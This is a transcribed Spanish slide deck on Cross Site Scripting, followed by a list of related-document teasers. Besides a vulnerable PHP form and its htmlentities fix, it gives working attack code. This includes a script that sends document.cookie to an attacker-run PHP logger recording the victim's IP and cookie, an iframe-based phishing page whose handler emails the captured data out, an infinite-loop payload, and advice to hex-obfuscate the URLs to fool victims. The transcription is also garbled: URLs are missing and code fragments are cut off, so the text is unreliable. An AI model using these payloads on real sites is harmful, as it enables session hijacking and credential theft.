Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro antonio@noveria.es

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro www.noveria.es antonio@noveria.es"

Transcripción

1 Cross Site Scripting Conceptos Básicos y Casos prácticos Antonio González Castro antonio@noveria.es

2 # Definición Cross Site Scripting o también conocido como XSS por sus siglas en inglés, corresponde a una vulnerabilidad que afecta tanto al usuario como a nivel aplicativo. La causa de la vulnerabilidad radica en la validación de entradas HTML incrustadas, usando diversas técnicas para inyectar código de marcas (HTML) o código ejecutable en la maquina cliente (Javascript, VBscript o Active X). El impacto de este tipo de vulnerabilidades, significa que la entrada (URL previamente manipulada) no la proporciona el mismo usuario, sino un atacante. Su finalidad persiste en la ejecución de la entrada por parte del usuario, con el fin de conseguir diversos objetivos limitados tanto por la capacidad del lenguaje inyectado, como del atacante. # Clasificación La clasificación de este tipo vulnerabilidad persiste en varias tesis, unos lo clasifican como ataques al usuario y ataques al sistema, indirectos y directos, persistentes y no persistentes Es este yo voy a utilizar la siguiente categorización ya que personalmente creo que es la más correcta. Cross Site Scripting Reflejado; es la más común, y no permite la inserción código directo. Sucede cuando se envía un mensaje o ruta en una URL, una cookie o en la cabecera HTTP (pudiendo extenderse al DOM del navegador). Cross Site Scripting Almacenado; los datos son almacenados a través de una Base de Datos ó archivo. La deficiente programación al filtrar las entradas, nos permite la ejecución de código directo. # Escenarios de ataque Estudiamos el siguiente código: <form action="noveria.php" method="post"> <p>tu vulnerabilidad favorita:</p> <p><input type="radio" name="vulnerabilidad" value="xss">xss</p> <p><input type="radio" name="vulnerabilidad" value="lfi">lfi</p> <p><input type="radio" name="vulnerabilidad" value="rfi">rfi</p> <input type="submit" name="boton" value="enviar"> </form> Contenido del archivo noveria.php: <?php # Código del php Vulnerable $Choice = $_REQUEST['vulnerabilidad']; <html> <head></head> <body> <p>su vulnerabilidad favorita es: <?php echo $Choice </p> </body> </html> Podemos observar que noveria.php es vulnerable, debido a que la variable no está filtrada, para corregir este error solo tenemos que filtrar la entrada, utilizando la función htmlentities. Al margen de esta, tenemos más opciones como la función HTMLSpecialchars.

3 # Código del php Vulnerable $Choice = htmlentities($_request['vulnerabilidad']); <html> <head></head> <body> <p>su vulnerabilidad favorita es: <?php echo $Choice </p> </body> </html> La manera o forma de explotar la vulnerabilidad en este caso sería tan sencillo como ejecutar la siguiente URL. cript> Este es el punto y hasta donde el 90% de atacantes llegan en su intento de ataque XSS, pero existen muchas más técnicas y poderes secretos mucho más atractivos y útiles. Como por ejemplo, usando Framesets podemos crear un loop infinito, afectando directamente sobre la maquina local por parte del usuario. Javascript:while(1)alert("loop infinito"); # Suplantación de identidad, robo de coockies Obtención de datos, personalmente el ataque más importante que nos proporciona un cross site scripting, depende en que escenario nos encontremos podemos robar una cookie en concreto, borrar información de una Base de Datos y todo lo que el aplicativo y nuestros conocimientos nos permitan. En este caso nos vamos a centrar en el robo de una cookie en concreto, ya que se puede explotar en varios escenarios y afecta directamente contra la integridad del usuario llegándonos a permitir el acceso al sistema, se podría plantear algunas dudas, si el usuario cierra sesión la cookie caduca, pero gracias a la librería curl, el atacante con la cookie activa en ese momento podría acceder al aplicativo, y dejarlo en cache, en este caso se podría acceder en cualquier momento. Procedemos a estudiar un caso práctico. A través de cualquier medio enviamos la siguiente dirección (URL) al usuario que deseamos obtener su cookie. src= Conociendo que noveria.js ejecuta un archivo php. var ubicacion=' location.href=ubicacion+document.cookie El archivo noveria.php almacena en un archivo.txt con la cookie del usuario y su IP, dicho archivo tiene el siguiente aspecto.

4 $ip = $_SERVER['REMOTE_ADDR']; # Obtención de la IP del usuario $cookie = $_GET['cookie']; # Obtención de la Cookie del usuario $info = "Ip: ". $ip. "Cookie: ". $cookie. " "; $archivo = fopen("cookie.txt",'a'); # Abrimos el archivo.txt fwrite($archivo,$info); # Guardamos la información en el archivo.txt fclose($archivo); # Cerramos el archivo header("location: # Redireccionamos # Phishing Una vulnerabilidad XSS nos permite realizar ataques de phishing utilizando como base el dominio original de la aplicación. Para los más despistados, phishing es un ataque almacenado en el área de la ingeniería social, caracterizado por adquirir información de forma fraudulenta. En este caso vamos a seguir con el ejemplo anterior y vamos a conseguir que en nuestra encuesta, los datos no lleguen a su destino, sino a uno especialmente manipulado. Como ejemplo vamos a almacenar nuestra web manipulada en el dominio con el siguiente script conseguimos modificar el titulo de la página para simular que nos encontramos en la página original, además abre una ventana adicional dentro de la misma página, donde se carga el archivo noveria.html. Este script lo ejecutaremos por medio del XSS. document.title = "Encuesta noveria"; document.write("<iframe src= frameborder=0 framespacing=0 scrolling=auto border=0 marginheight=0 marginwidth=0 width=100% height=100% /> "); Simplemente necesitamos hacer una copia exacta de la web original, y modificamos el form action quedando de la siguiente manera: <form action="noveria-maligna.php" method="post"> <p>tu vulnerabilidad favorita:</p> <p><input type="radio" name="vulnerabilidad" value="xss">xss</p> <p><input type="radio" name="vulnerabilidad" value="lfi">lfi</p> <p><input type="radio" name="vulnerabilidad" value="rfi">rfi</p> <input type="submit" name="boton" value="enviar"> </form> Añadimos el siguiente script al código. <SCRIPT TYPE="text/javascript" LANGUAGE=JAVASCRIPT> if (top.frames.length!=0){ top.frames.length=0;} </SCRIPT> De este modo cuando hagamos la petición al archivo noveria-maligna.js, la ventana ocupe el tamaño completo del navegador. Para finalizar nuestra web falsa, debemos crear el archivo noveria-maligna.php, este enviará un correo electrónico con el resultado de la encuesta.

5 # Envio por correo resultado encuesta if ($_POST['vulnerabilidad']){ $leeter = "tu-correo@noveria.es"; $vulnerabilidad = $_POST['vulnerabilidad']; $asunto = "Phishing noveria maligna"; $from = "La vulnerabilidad favorita es: $vulnerabilidad"; mail($leeter, $asunto, $from); } # Redirección header("location: Por lo tanto la URL que vamos a utilizar y difundir para nuestro ataque de phishing es la siguiente: src= Si deseamos aumentar la capacidad de engaño de las URLs, solo debemos transformarlas a hexadecimal, el resultado a nivel ejecución de las URLs es el mismo, diferenciándose en la ofuscación su contenido para evitar cualquier tipo de sospechas ante él usuario.

http://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com

http://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com Conceptos XSS: (Cross Site Scripting) tipo de vulnerabilidad surgida como consecuencia de errores de filtrado de las entradas del usuario en aplicaciones

Más detalles

################## # Cross Site Scripting [XSS] # Autor: sl4xuz # Contact: sl4x.xuz@gmail.com ##################

################## # Cross Site Scripting [XSS] # Autor: sl4xuz # Contact: sl4x.xuz@gmail.com ################## ################## # Cross Site Scripting [XSS] # Autor: sl4xuz # Contact: sl4x.xuz@gmail.com ################## [~] Indice [~] 0x01 - Introducción 0x02 - Qué es XSS? 0x03 - Casos en que se presenta XSS

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

Índice. 1. Introducción al XSS. 2. Taller Práctico Explotando la Vulnerabilidad. 3. Robo de cookies Uso de estas. 4. Arreglando la vulnerabilidad.

Índice. 1. Introducción al XSS. 2. Taller Práctico Explotando la Vulnerabilidad. 3. Robo de cookies Uso de estas. 4. Arreglando la vulnerabilidad. Índice 1. Introducción al XSS. Qué es el XSS? Por qué se produce? Tipos de XSS 2. Taller Práctico Explotando la Vulnerabilidad. XSS Reflejado XSS Persistente 3. Robo de cookies Uso de estas. Como robar

Más detalles

ARE YOUR WEB VULNERABLE?

ARE YOUR WEB VULNERABLE? CROSS-SITE SITE SCRIPTING: ARE YOUR WEB APPLICATIONS VULNERABLE? Alberto Calle Alonso Sebastián Marcos Miguel Mateo de la Puente Madrid, Febrero 2009 1 ÍNDICE Introducción Cross-site scripting HTTP y HTML

Más detalles

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS Pautas básicas para el DESARROLLO DE PLUGINS ÍNDICE 1. Protección contra CSRF............................. 2. Protección XSS.................................... 3. Protección contra inyecciones SQL6...................

Más detalles

Detectar y solucionar infecciones en un sitio web

Detectar y solucionar infecciones en un sitio web Detectar y solucionar infecciones en un sitio web Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Las infecciones que sufren los sitios web son uno de los principales

Más detalles

Capítulo 2.- Vulnerabilidades en aplicaciones web.

Capítulo 2.- Vulnerabilidades en aplicaciones web. Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como

Más detalles

Índice: Tema 4.3 4.3 Aplicaciones basadas en Sesiones

Índice: Tema 4.3 4.3 Aplicaciones basadas en Sesiones Índice: Tema 4.3 4.3 Aplicaciones basadas en Sesiones 4.3.1 Manejo de Cookies 4.3.2 Manejo de Sesiones 4.3.3 Aplicación basada en sesiones Índice: Tema 4.3 4.3 Aplicaciones basadas en Sesiones 4.3.1 Manejo

Más detalles

Hostaliawhitepapers. Redirección 301. Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199. www.hostalia.com

Hostaliawhitepapers. Redirección 301. Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199. www.hostalia.com Redirección 301 Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Redirección 301 Alguna vez te has planteado cambiar tu aplicación web que tienes en marcha a otra dirección

Más detalles

Internet Information Server

Internet Information Server Internet Information Server Internet Information Server 5.0 es un servidor web, que incluye los servicios de HTTP, HTTPS, FTP, SMTP (correo saliente) y NNTP (grupos de noticias). Además es capaz de ejecutar

Más detalles

Teléfono: +34-96-398-5300 Telefax: +34-96-196-1781 Email: csirtcv@gva.es https://www.facebook.com/csirtcv https://twitter.

Teléfono: +34-96-398-5300 Telefax: +34-96-196-1781 Email: csirtcv@gva.es https://www.facebook.com/csirtcv https://twitter. Como identificar phishing Sobre CSIRT-cv CSIRT-cv es el Centro de Seguridad TIC de la Comunitat Valenciana. Nace en junio del año 2007, como una apuesta de la Generalitat Valenciana por la seguridad en

Más detalles

Software Criptográfico FNMT-RCM

Software Criptográfico FNMT-RCM Software Criptográfico FNMT-RCM ÍNDICE 1. DESCARGA E INSTALACIÓN DEL SOFTWARE 2. EXPORTACIÓN DE CERTIFICADOS EN MICROSOFT INTERNET EXPLORER 3. IMPORTACIÓN DEL CERTIFICADO A LA TARJETA CRIPTOGRÁFICA -2-

Más detalles

Introducción a PHP. * No es necesario declarar previamente las variables.

Introducción a PHP. * No es necesario declarar previamente las variables. Introducción a PHP La programación de sitios web cada día está más orientada al desarrollo de páginas dinámicas y aplicaciones, o sea sitios donde el usuario pueda interactuar con la web. Dentro de los

Más detalles

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)

Más detalles

MINT A NIVEL BROSERW CON BEEF

MINT A NIVEL BROSERW CON BEEF MINT A NIVEL BROSERW CON BEEF Y METASPLOIT Como usuario seguimos con las mismavulnerabilidades 17 DE ABRIL DEL 2015 SANTA CRUZ BOLIVIA WALTER CAMAMA MENACHO About Me About Me - Ingeniero de sistemas Universidad

Más detalles

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014 Roberto Garcia Amoriz Except where otherwise noted, this work is licensed under: http://creativecommons.org/licenses/by-nc-sa/3.0/ c_b_n_a QUIEN SOY Roberto García Amoriz: trabajaba como Administrador

Más detalles

PRÁCTICA 10. Configuración de Correo y Publicar en la Web

PRÁCTICA 10. Configuración de Correo y Publicar en la Web PRÁCTICA 10. Configuración de Correo y Publicar en la Web INFORMÁTICA BÁSICA Publicidad y Relaciones Públicas y Periodismo. Curso 2006/2007 1. Configuración del correo Gestores de correo en la máquina

Más detalles

ANTIPHISHING: Qué es? Para qué sirve? De qué protege? Escenarios de aplicación. Recomendaciones y buenas prácticas.

ANTIPHISHING: Qué es? Para qué sirve? De qué protege? Escenarios de aplicación. Recomendaciones y buenas prácticas. ANTIPHISHING: Qué es? El phishing es una técnica que combina el spam (envío de correos masivos de forma indiscriminada) y la ingeniería social (tácticas de persuasión que suelen valerse de la buena voluntad

Más detalles

Ayuda básica relativa al interfaz web

Ayuda básica relativa al interfaz web Ayuda básica relativa al interfaz web El webmail es un cliente de correo que nos permite visualizar los mensajes de nuestras cuentas de email a través de una página web, pudiendo acceder desde cualquier

Más detalles

Cookies: qué son y para qué sirven

Cookies: qué son y para qué sirven Cookies: qué son y para qué sirven Desde hace un tiempo las webs nos indican con mensajes que utilizan cookies propias de terceros. Muchos usuarios aceptan el mensaje sin más por el simple hecho de que

Más detalles

DOCUMENTOS COMPARTIDOS CON GOOGLE DOCS

DOCUMENTOS COMPARTIDOS CON GOOGLE DOCS DOCUMENTOS COMPARTIDOS CON GOOGLE DOCS 1. Introducción Los ambientes de aprendizaje acompañados de trabajos colaborativos como estrategia se revierten en actividades de diferente índole (análisis de videos,

Más detalles

La plantilla propone aprovechar esta estructura en común y sólo modificar el contenido del área del documento que sea diferente.

La plantilla propone aprovechar esta estructura en común y sólo modificar el contenido del área del documento que sea diferente. PLANTILLAS EN PHP El concepto de plantilla, es un criterio del desarrollo web que propone optimizar la cantidad de documentos HTML que se usan en el desarrollo de un sitio web. A lo largo de la navegación

Más detalles

COMPROBACIONES BÁSICAS PARA EL USO DE FIRMA EN EL RTC

COMPROBACIONES BÁSICAS PARA EL USO DE FIRMA EN EL RTC TITULO: COMPROBACIONES BÁSICAS PARA EL USO DE FIRMA EN EL RTC RESUMEN: La idea de este documento es mostrar una serie de acciones y ayudas básicas para intentar determinar y solucionar problemas en la

Más detalles

Manual de Usuario de la Herramienta SICRES-Tester. SIR Sistema de Interconexión de Registros. Tipo de documento. Fecha de entrega 08/04/2014

Manual de Usuario de la Herramienta SICRES-Tester. SIR Sistema de Interconexión de Registros. Tipo de documento. Fecha de entrega 08/04/2014 MINISTERIO DE HACIENDA Y ADMINISTRACIONES PÚBLICAS SECRETARÍA DE ESTADO DE ADMINISTRACIONES PÚBLICAS DIRECCIÓN GENERAL DE MODERNIZACIÓN ADMINISTRATIVA, PROCEDIMIENTOS E IMPULSO DE LA ADMINISTRACIÓN ELECTRONICA

Más detalles

Su Seguridad es Nuestro Éxito

Su Seguridad es Nuestro Éxito Su Seguridad es Nuestro Éxito c. Santander, 101. Edif. A. 2º I 08030 Barcelona I Tel.: 93 305 13 18 I Fax: 93 278 22 48 I info@isecauditors.com I www.isecauditors.com OWASP Conference 2007 Barcelona, Julio

Más detalles

Manual de Webalizer. Sync-Intertainment

Manual de Webalizer. Sync-Intertainment Manual de Webalizer Sync-Intertainment ESTADISTICAS WEBALIZER Manual Webalizer Webalizer es un potente programa de estadísticas para su sito web, permite el análisis de los datos obtenidos del log de apache,

Más detalles

Desarrollo Web en Entorno Servidor

Desarrollo Web en Entorno Servidor Desarrollo Web en Entorno Servidor Tema 1: Introducción 1. Tipos de páginas Web. 2. Instalación del software. (XAMPP) 1 Tipos de páginas Web. Páginas estáticas. Páginas dinámicas. 2 Tipos de páginas Web.

Más detalles

19 4.1.1.0 4 04/05/2009

19 4.1.1.0 4 04/05/2009 Soluciones Informáticas Descripción: Como utilizar la Agenda de Visitas Objetivos: Al finalizar este tutorial el usuario será capaz de utilizar la Agenda de Visitas con sus diferentes opciones: asignar

Más detalles

2. Seleccione OneDrive en la parte superior de los sitios de SharePoint u Office 365 de su organización.

2. Seleccione OneDrive en la parte superior de los sitios de SharePoint u Office 365 de su organización. Como acceder a nuestra cuenta de OneDrive Business: 1. Inicie sesión en Office 365 (https://portal.office.com). 2. Seleccione OneDrive en la parte superior de los sitios de SharePoint u Office 365 de su

Más detalles

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales Session Hijacking: en aplicaciones web empresariales OWASP LATAM TOUR 2012 OMAR PALOMINO HUAMANÍ KUNAK CONSULTING SAC omarc320@gmail.com opalomino@kunak.com.pe Telef: 973861650 http://www.el-palomo.com

Más detalles

Login y Password. Elección de directorios confidenciales

Login y Password. Elección de directorios confidenciales Login y Password La verdadera funcionalidad del programa tiene lugar cuando usted no tiene en su poder el ordenador donde lo instala. Por lo tanto, es importante que usted recuerde su login y password

Más detalles

Traslado de Copias y Presentación de Escritos. Manual de Usuario V.3.1

Traslado de Copias y Presentación de Escritos. Manual de Usuario V.3.1 Traslado de Copias y Presentación de Escritos Manual de Usuario V.3.1 Página: 2 45 INDICE INTRODUCCIÓN... 3 1 ACCESO A LA APLICACIÓN... 3 2 PROCESO DE FIRMA... 4 3 TRASLADOS PENDIENTES DE ACEPTAR POR EL

Más detalles

Te explicamos cómo poner la firma de correo con tu imagen, en los clientes de correo más utilizados:

Te explicamos cómo poner la firma de correo con tu imagen, en los clientes de correo más utilizados: Firmas de correo Te explicamos cómo poner la firma de correo con tu imagen, en los clientes de correo más utilizados: Correo web/webmail(roundcube), Outlook y Thunderbird. También te explicamos, como crear

Más detalles

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL

Más detalles

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1 Sesión 13. Seguridad en la web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Características de MongoDB 2. Colecciones - documentos 3. Consulta, inserción, modificación, eliminación

Más detalles

MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD

MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD Fecha última revisión: Diciembre 2010 Tareas Programadas TAREAS PROGRAMADAS... 3 LAS TAREAS PROGRAMADAS EN GOTELGEST.NET... 4 A) DAR DE ALTA UN USUARIO...

Más detalles

INSTITUTO POLITÉCNICO NACIONAL WEB APPLICATION DEVELOPMENT. CIFUENTES ALVAREZ ALEJANDRO SIGFRIDO 3cm3 PROYECTO TERCER PARCIAL MI HOTMAIL CON JOOMLA

INSTITUTO POLITÉCNICO NACIONAL WEB APPLICATION DEVELOPMENT. CIFUENTES ALVAREZ ALEJANDRO SIGFRIDO 3cm3 PROYECTO TERCER PARCIAL MI HOTMAIL CON JOOMLA INSTITUTO POLITÉCNICO NACIONAL ESCUELA SUPERIOR DE CÓMPUTO WEB APPLICATION DEVELOPMENT CIFUENTES ALVAREZ ALEJANDRO SIGFRIDO 3cm3 PROYECTO TERCER PARCIAL MI HOTMAIL CON JOOMLA Alumno: MUÑOZ SALAZAR RICARDO

Más detalles

Buenas Prácticas en Correo Electrónico

Buenas Prácticas en Correo Electrónico Buenas Prácticas en Correo Electrónico Ataques mas frecuentes que se realizan por Correo Electrónico Tomado de: http://ceds.nauta.es/bpcorreo.ppt Modificado por Lidia Guerra Prevenir los problemas Actos

Más detalles

MANUAL DE AYUDA. SAT Móvil (Movilidad del Servicio Técnico)

MANUAL DE AYUDA. SAT Móvil (Movilidad del Servicio Técnico) MANUAL DE AYUDA SAT Móvil (Movilidad del Servicio Técnico) Fecha última revisión: Abril 2015 INDICE DE CONTENIDOS INTRODUCCION SAT Móvil... 3 CONFIGURACIONES PREVIAS EN GOTELGEST.NET... 4 1. INSTALACIÓN

Más detalles

MANUAL DE AYUDA MANEJO DE SHAREPOINT CON GOTELGEST.NET

MANUAL DE AYUDA MANEJO DE SHAREPOINT CON GOTELGEST.NET MANUAL DE AYUDA MANEJO DE SHAREPOINT CON GOTELGEST.NET Fecha última revisión: Febrero 2012 INDICE DE CONTENIDOS MANEJO DE SHAREPOINT EN GOTELGEST.NET... 3 1. CONFIGURACIÓN GESTIÓN DOCUMENTAL... 3 2. SINCRONIZACIÓN

Más detalles

Manual Sistema de Afiliados Lomas Travel

Manual Sistema de Afiliados Lomas Travel Manual Sistema de Afiliados Lomas Travel Contenido Registro de Afiliados... 3 Administración de su cuenta... 7 Ingresar... 7 Uso del Administrador... 8 Configuración de Plantilla... 9 1.-Opción de subir

Más detalles

Qué es el Phishing. Consejos para evitar el Phishing

Qué es el Phishing. Consejos para evitar el Phishing Qué es el Phishing La seguridad de nuestros datos se ve comprometida en muchas ocasiones al navegar por Internet, dar las cadenas de nombre de usuario y contraseña en correos electrónicos o seguir enlaces

Más detalles

Manual de Uso de Webmail

Manual de Uso de Webmail Manual de Uso de Webmail Fecha: 16/06/2014 Version: 1.0 Indice Ingreso al Webmail...3 Descripción general del Entorno...4 Opciones de correo...5 Redactar un nuevo email...6 Opciones de contactos...7 Libreta

Más detalles

PowerPoint 2010 Hipervínculos y configuración de acciones

PowerPoint 2010 Hipervínculos y configuración de acciones PowerPoint 2010 Hipervínculos y configuración de acciones Contenido CONTENIDO... 1 HIPERVÍNCULOS... 2 CONFIGURACIÓN DE ACCIONES... 6 HIPERVÍNCULOS EN POWERPOINT WEB APP... 8 1 Hipervínculos En Microsoft

Más detalles

CONFIGURACION AVANZADA DE MOZILLA THUNDERBIRD

CONFIGURACION AVANZADA DE MOZILLA THUNDERBIRD CONFIGURACION AVANZADA DE MOZILLA THUNDERBIRD Carpetas sin Conexión... 2 Gestión de mensajes enviados... 3 Gestión de mensajes eliminados... 6 Firma Digital... 8 Envío de mensajes firmados digitalmente...

Más detalles

GENERAR DOCUMENTOS HTML USANDO LENGUAJE PHP. EJERCICIO RESUELTO EJEMPLO SENCILLO. (CU00733B)

GENERAR DOCUMENTOS HTML USANDO LENGUAJE PHP. EJERCICIO RESUELTO EJEMPLO SENCILLO. (CU00733B) APRENDERAPROGRAMAR.COM GENERAR DOCUMENTOS HTML USANDO LENGUAJE PHP. EJERCICIO RESUELTO EJEMPLO SENCILLO. (CU00733B) Sección: Cursos Categoría: Tutorial básico del programador web: HTML desde cero Fecha

Más detalles

Cómo alojar tu blog en servidor propio e instalar Wordpress

Cómo alojar tu blog en servidor propio e instalar Wordpress Cómo alojar tu blog en servidor propio e instalar Wordpress Este post va a tratar de explicar paso a paso cómo alojar un blog o página web personal en un servidor y posteriormente, cómo instalar la última

Más detalles

Instituto Nacional de Formación Docente. Tutorial 5 Líneas de Tiempo con Timerime

Instituto Nacional de Formación Docente. Tutorial 5 Líneas de Tiempo con Timerime Tutorial 5 Líneas de Tiempo con Timerime 1 Introducción a Timerime Timerime (www.timerime.com) es una aplicación que funciona en la web (como otras tantas que forman parte de la llamada Web 2.0). La misma

Más detalles

PLATAFORMA ON-LINE DE FORMACIÓN. Manual del Alumno

PLATAFORMA ON-LINE DE FORMACIÓN. Manual del Alumno PLATAFORMA ON-LINE DE FORMACIÓN Manual del Alumno Contenido Glosario... 3 Foros... 4 Cuestionario... 5 Wiki... 6 Tareas... 7 Cursos... 8 Participantes... 9 Calificaciones... 10 Perfil... 11 Scorm... 14

Más detalles

CREACIÓN O MIGRACIÓN DEL CORREO POP A IMAP PARA OUTLOOK EXPRESS 6

CREACIÓN O MIGRACIÓN DEL CORREO POP A IMAP PARA OUTLOOK EXPRESS 6 CREACIÓN O MIGRACIÓN DEL CORREO POP A IMAP PARA OUTLOOK EXPRESS 6 Creación y configuración de la cuenta IMAP... 2 Hacer copia de seguridad del correo... 6 Eliminación de la antigua cuenta de correo...

Más detalles

PROGRAMACIÓN PÁGINAS WEB CON PHP

PROGRAMACIÓN PÁGINAS WEB CON PHP PROGRAMACIÓN PÁGINAS WEB CON PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología

Más detalles

Ayuda para la instalación Componente Firma Digital INDICE. 1 Configuración previa...2. 1.1 Configuración Internet Explorer para ActiveX...

Ayuda para la instalación Componente Firma Digital INDICE. 1 Configuración previa...2. 1.1 Configuración Internet Explorer para ActiveX... INDICE 1 Configuración previa...2 1.1 Configuración Internet Explorer para ActiveX...2 1.2 Problemas comunes en sistema operativo Windows...8 1.2.1 Usuarios con sistema operativo Windows XP con el Service

Más detalles

Sesiones en PHP. Área de Ingeniería Telemática

Sesiones en PHP. Área de Ingeniería Telemática Sesiones en PHP Contenido Estado de la conexión con el navegador Cookies Sesiones Sesiones en PHP 2 Estado de la conexión con el navegador Cuando el usuario solicita una página que es en verdad un PHP

Más detalles

Manual del panel. Core-Admin

Manual del panel. Core-Admin Manual del panel Core-Admin - Manual del panel Core-Admin ÍNDICE 1. Introducción...3 2. Requisitos iniciales...3 2.1. Navegadores soportados...3 2.2. Javascript y Java...3 3. Usar Core-Admin...3 3.1. Acceder

Más detalles

Aplicateca. Manual de Usuario: Ilion Factura Electrónica. Espíritu de Servicio

Aplicateca. Manual de Usuario: Ilion Factura Electrónica. Espíritu de Servicio Aplicateca Manual de Usuario: Ilion Factura Electrónica Espíritu de Servicio Índice 1 Introducción... 4 1.1 Qué es Ilion Factura electrónica?... 4 1.2 Requisitos del sistema... 4 1.3 Configuración del

Más detalles

S E G U R I D A D E N A P L I C A C I O N E S W E B

S E G U R I D A D E N A P L I C A C I O N E S W E B H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A

Más detalles

PANEL DE CONTROL (Zona de Administración) MANUAL DE USO Por conexanet. Revisión 1.1 Fecha 2006-08

PANEL DE CONTROL (Zona de Administración) MANUAL DE USO Por conexanet. Revisión 1.1 Fecha 2006-08 PANEL DE CONTROL (Zona de Administración) MANUAL DE USO Por conexanet Revisión 1.1 Fecha 2006-08 Índice 1. Acceder 2. Menú 3. Gestión Básica 3.1 Añadir 3.2 Editar 3.3 Eliminar 3.4 Eliminación de registros

Más detalles

==== Introducción. ==== Buscando un fallo

==== Introducción. ==== Buscando un fallo =============================== Horde/Imp: Cross Site Scripting in Email Subject =============================== FraMe - frame at kernelpanik.org http://www.kernelpanik.org ===============================

Más detalles

Cómo capturar páginas web con el programa GNU Wget

Cómo capturar páginas web con el programa GNU Wget Cómo capturar páginas web con el programa GNU Wget Raúl Araya, Judit Feliu, Mercedes Suárez {raul.araya; judit.feliu; mercedes.suarez}@iula.upf.es Qué es GNU Wget? Una utilidad de código abierto (GNU)

Más detalles

Una App para Facebook

Una App para Facebook Una App para Facebook Static HTML: Iframes Tabs Laboratorio de Excelencia Digital Facebook Marketing 1 Una App para Facebook. Static HTML: Iframes Tabs Facebook Marketing El objetivo de este articulo es

Más detalles

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.

Más detalles

Bibliotecas Escolares. Perfil de Lector.

Bibliotecas Escolares. Perfil de Lector. Bibliotecas Escolares. Perfil de Lector. 2012 Como usuario Lector de AbiesWeb, podrás acceder al catálogo de fondos, solicitar reservas, ver tus préstamos activos, ver el historial de tus lecturas, escribir

Más detalles

Técnicas para mantener estado entre páginas con PHP

Técnicas para mantener estado entre páginas con PHP Técnicas para mantener estado entre páginas con PHP Buenos Aires, Septiembre de 2007 Román A. Mussi romanmussi@gmail.com 1. Alcance de variables en aplicaciones de escritorio y en aplicaciones web En el

Más detalles

Distribución de vídeo capturado con la cámara en las páginas Web

Distribución de vídeo capturado con la cámara en las páginas Web Distribución de vídeo capturado con la cámara en las páginas Web Este documento ofrece información de referencia relacionada con la distribución de vídeo capturado con la cámara en una página Web. Personalización

Más detalles

CONFEDERACIÓN DE EMPRESARIOS DE MÁLAGA

CONFEDERACIÓN DE EMPRESARIOS DE MÁLAGA GUÍA DEL ALUMNO 1 Introducción 2 Acceso a la plataforma 3 Cerrar sesión 4 Estructura del curso virtual 5 Foros 5.1 No quiero recibir copias de los foros en mi email 6 Mensajería Interna 7 Como subir tareas

Más detalles

La utilización de las diferentes aplicaciones o servicios de Internet se lleva a cabo respondiendo al llamado modelo cliente-servidor.

La utilización de las diferentes aplicaciones o servicios de Internet se lleva a cabo respondiendo al llamado modelo cliente-servidor. Procesamiento del lado del servidor La Programación del lado del servidor es una tecnología que consiste en el procesamiento de una petición de un usuario mediante la interpretación de un script en el

Más detalles

Manual de usuario de Parda Programa de Almacenamiento y Recuperación de Datos Automático

Manual de usuario de Parda Programa de Almacenamiento y Recuperación de Datos Automático Programa de Almacenamiento y Recuperación de Datos Automático CONSEJERÍA DE EDUCACIÓN Dirección General de Participación e Innovación Educativa Centro de Gestión Avanzado de Centros TIC Fecha: 20/04/10

Más detalles

